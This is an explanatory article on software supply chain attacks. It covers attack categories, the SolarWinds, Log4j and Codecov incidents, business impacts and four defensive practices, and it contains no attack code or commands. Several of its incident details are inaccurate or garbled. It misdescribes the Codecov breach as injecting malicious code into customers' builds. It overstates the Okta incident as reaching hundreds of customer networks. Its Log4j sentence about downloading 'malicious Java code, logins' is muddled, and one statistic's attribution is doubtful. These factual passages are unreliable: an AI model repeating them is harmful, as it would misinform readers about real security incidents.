Software supply chain attacks have rapidly emerged as one of the most insidious cybersecurity threats facing organizations today. As software vendors, cloud providers, contractors and other third parties become increasingly interconnected, vulnerabilities introduced anywhere along an organization’s digital supply chain can have cascading impacts downstream.
Recent high-profile supply chain attacks like SolarWinds and Log4j have put these risks into stark relief. Clearly, traditional cybersecurity practices are no longer sufficient to protect organizations in today’s complex, hyperconnected business ecosystem. New proactive strategies and technologies are required to get ahead of software supply chain risks before they metastasize into full-blown crises.
This article provides cybersecurity leaders and technology decision makers with a comprehensive overview of the software supply chain attack landscape. It defines what supply chain attacks are, provides real-world examples, explores the business impacts, and offers actionable recommendations for identifying and mitigating supply chain vulnerabilities at scale.
What Exactly Are Software Supply Chain Attacks?
Before exploring defensive strategies, it’s important to set a level on what precisely constitutes a software supply chain attack.
A software supply chain encompasses all of the external vendors, open source libraries, software-as-a-service (SaaS) applications, infrastructure providers and other third parties that create and deliver the technology an organization relies on. The supply chain enables organizations to efficiently assemble best-of-breed solutions without having to build everything in-house.
However, this interconnectedness also introduces security risks. Vulnerabilities anywhere along the supply chain – whether in a vendor’s source code or IT infrastructure – can potentially be exploited to compromise downstream customers. Attackers are increasingly targeting the supply chain as an initial ingress point to permeate otherwise well-defended organizations.
Supply chain attacks generally fall into three categories:
Infrastructure Attacks
These attacks target the IT infrastructure underpinning software delivery, such as a cloud provider or software vendor’s systems. Sensitive data, configurations, keys or credentials stored on this compromised infrastructure can then be intercepted and leveraged to infiltrate customer environments.
The SolarWinds and Codecov attacks are prime examples where malicious code was surreptitiously injected into software updates distributed from the vendors’ development environments. Microsoft attributes the SolarWinds campaign to nation-state actors who compromised the IT infrastructure of a key federal IT provider in order to access customer data.
Dependency Attacks
Applications and services invariably rely on code libraries and modules from public repositories like GitHub as well as commercial providers. Dependency attacks target these shared codebases, injecting malware that is then integrated into many finished software products and passed on to users.
Open source vulnerabilities like Log4Shell, related to the extremely popular Log4j logging library, can be potentially catastrophic given how ubiquitously the library is integrated across applications. Log4j dependencies exist in products from virtually every major software vendor, exposing millions of users to exploit.
Credential Theft
Many supply chain attacks aim to steal vendor credentials, keys and certificates, allowing attackers to bypass security controls and masquerade as legitimate actors. With these keys to the kingdom, attackers can infiltrate downstream systems, access sensitive data, and move laterally across connected environments.
The recent attack on cloud services provider Okta via a third party support agent involved credential theft of this kind. With an Okta administrator credential, the attacker was able to bypass the company’s own security controls and access hundreds of downstream customer networks.
Real-World Software Supply Chain Attacks
Beyond defining what supply chain attacks entail in the abstract, it’s instructive to explore real-world examples that illustrate the diversity and complexity of these threats in action.
SolarWinds
In late 2020, nation-state threat actors associated with Russia executed one of history’s most expansive and sophisticated supply chain cyber attacks. According to cybersecurity agencies in the US and UK, the attackers first breached the IT infrastructure of SolarWinds, an enterprise network monitoring software vendor.
The attackers then trojanized software updates for SolarWinds’ Orion product by injecting malicious code. When downloaded by SolarWinds’ government and commercial customers, this code created a stealthy backdoor to customer systems. US officials reported that upwards of 18,000 private and public sector organizations installed the corrupted Orion updates.
This initial software supply chain attack opened the door for the threat actors to steal data and gain persistent access to high-value targets like the US Treasury, Justice Department, State Department, Department of Energy and components of the Defense Department. The White House called it “likely Russian in origin” and stated it would take years to fully assess and recover from the damage.
Log4j Vulnerability
In December 2021, a severe vulnerability known as Log4Shell was uncovered in Log4j, an extremely popular open source Java logging framework. Log4j is integrated into millions of enterprise applications from vendors including Apple, Amazon, IBM, Cisco, HP, Tesla and countless others.
The Log4j vulnerability makes it possible for unauthenticated remote attackers to download malicious Java code, logins, and more onto vulnerable servers. It necessitated urgent patching across virtually the entire industry. Major disruptions occurred as organizations scrambled to identify and update Log4j instances across their sprawling application estates and supply chains.
Cybercriminals were quick to weaponize Log4j for cryptojacking schemes, botnet creation, and ransomware campaigns. The vulnerability remains under widespread exploitation globally. The identity data firm ForgeRock reported that 46% of its corporate customers were targeted by attempted Log4j exploits within just the first five days.
Codecov Attack
In April 2021, Codecov — a service used to test application code coverage during software development — was breached by attackers who gained access to its Bash Uploader utility. This uploader is extensively used by Codecov’s 29,000+ customers to send code for analysis on Codecov’s SaaS platform.
The attackers were able to modify the Bash Uploader script and inject malicious code into software builds processed by Codecov, which were then passed back to customers. These customers in turn integrated the compromised codebases into their own applications and distributed them into production.
The attack impacted hundreds of organizations across technology, finance, insurance, health care and government sectors. Its broad reach illustrates the systemic risks of interconnected development pipelines across the software supply chain.
Business Impacts of Successful Supply Chain Attacks
Software supply chain attacks enable adversaries to sidestep traditional network perimeter defenses. The business impacts when these attacks succeed can be catastrophic on multiple levels:
- Compromise of Sensitive Data – Backdoor access to internal systems provided by supply chain attacks can lead to widespread compromise of sensitive data like intellectual property, customer information, financial records, strategic plans and more.
- System Outages & Business Disruption – Access to operational systems via compromised vendor channels can allow attackers to directly disrupt mission critical business processes by shutting down production applications, deleting data, interrupting services, etc.
- Loss of Customer Trust – High profile supply chain incidents damage corporate reputations and can cause customers to lose trust in the security and integrity of the impacted products and services.
- Financial Costs – Impacts like system downtime, data recovery/remediation, legal liabilities, notification costs and PR damage control can cost millions. The average total cost of a supply chain breach is over $6 million.
- Compliance Fines & Sanctions – Failure to protect sensitive customer data or systems supporting critical infrastructure may violate regulatory obligations, resulting in fines, mandated corrective actions, and loss of operating licenses.
Four Keys to Securing Your Software Supply Chain
Given the potentially massive ramifications, cybersecurity leaders must make software supply chain risk management an urgent priority. Adopting these four best practices can help significantly improve resilience:
1. Inventory All External Connections
You can’t secure what you don’t understand. The first step is gaining full visibility into the many vendors, contractors and software components that comprise your technology ecosystems. Catalog all external connections across the enterprise to understand potential avenues for upstream compromise.
Look beyond your immediate first-tier vendors to their partners and providers as well. Map out these interconnected relationships to identify high-risk nodes that could expose the broader network.
2. Assess Inherent Risk
With visibility established, develop a risk profile for each external partner. Assess factors like the sensitivity of their access, compliance with security controls, past breach incidents, reliance on risky technologies like Log4j, etc.
The higher risk entities warrant additional scrutiny and more stringent security requirements. Periodically re-evaluate risk profiles as partnerships and business relationships evolve.
3. Validate Security Controls
Don’t take vendors’ word when it comes to their own security practices. Validate that appropriate controls are demonstrably in place by having third parties complete standardized security assessments and require evidence like compliance report, infrastructure configuration and vulnerability scan results.
4. Monitor for Emerging Threats
Point-in-time assessments only provide a snapshot view of supplier risk. Continuously monitor your software supply chain for new threats and changes in partner risk profiles.
Employ tools that scour the dark web for stolen credentials, scan for malware in software dependencies, and alert when vulnerabilities emerge in vendor environments. Immediately address any critical findings with partners.
Closing the Software Supply Chain Security Gap
As software supply chain attacks proliferate in frequency and impact, organizations can no longer cling to reactive security practices. With critical business functions relying more than ever on third parties, the attack surface has expanded well beyond the traditional network perimeter.
By taking a data-driven, intelligence-led approach, cybersecurity leaders can get ahead of supply chain risk. They can proactively identify points of exposure, validate vendor security, detect emerging threats and compel corrective actions across the external attack surface early enough to prevent compromises from occurring in the first place.
Those who embrace these next-gen approaches will be well positioned to protect their organizations from the growing threat of software supply chain attacks in our increasingly interconnected world. The alternative is to wait helplessly for the inevitable breach notice from a compromised supplier that lands your company on tomorrow’s front page news headlines. The choice is clear.
